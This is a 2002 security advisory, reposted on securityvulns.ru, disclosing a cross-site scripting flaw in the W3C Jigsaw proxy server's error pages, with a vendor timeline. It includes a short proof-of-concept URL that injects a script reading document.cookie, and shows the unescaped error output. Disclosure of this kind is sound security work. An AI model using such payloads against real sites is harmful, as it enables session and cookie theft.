Computer Security
[EN] securityvulns.ru
no-pyccku



Related information

  Proxy error messages crossite scripting

  CERN Proxy Server: Cross-Site Scripting Vulnerability

  Re: Squid doesn't quote urls in error messages.

  Squid doesn't quote urls in error messages.

From:TAKAGI, Hiromitsu <takagi.hiromitsu_(at)_aist.go.jp>
Date:20.08.2002
Subject:W3C Jigsaw Proxy Server: Cross-Site Scripting Vulnerability (REPOST)

W3C Jigsaw Proxy Server: Cross-Site Scripting Vulnerability
===========================================================

Affected:
 Jigsaw 2.2.0 and earlier
 http://www.w3.org/Jigsaw/RelNotes.html#2.2.0

Fixed:
 Jigsaw 2.2.1
 http://www.w3.org/Jigsaw/RelNotes.html#2.2.1

Exploit:
 http://nonexistenthost.google.com/<SCRIPT>document.write(document.
cookie)</SCRIPT>

 ========================================================
 An HTTP error occured while getting: <p>
 <strong>http://nonexistenthost.google.com/<SCRIPT>document.
write(document.cookie)</SCRIPT></strong><p>
 Details "The host name [nonexistenthost.google.com] couldn't be resolved.
 Details: "nonexistenthost.google.com"".<hr>Generated by
 <i>http://.............:8001/
...snip...
 ========================================================
 
 Similar problems have been found in Proxomitron Naoko-4 BetaFour,
 Microsoft ISA Server and Squid 2.4 DEVEL4.
 <http://www.securityfocus.com/bid/3087>
 <http://www.microsoft.com/technet/security/bulletin/MS01-045.asp>
 <http://www.securityfocus.com/archive/1/197606>

Vendor Status:
 Aug 10, 2001: Notified
 Jan  4, 2002: Responded
 Apr  8, 2002: Fix released


Best regards,
--
Hiromitsu Takagi
http://staff.aist.go.jp/takagi.hiromitsu/

About | Terms of use | Privacy Policy
© SecurityVulns, 3APA3A, Vladimir Dubrovin
Nizhny Novgorod

 
 



Rating@Mail.ru
test server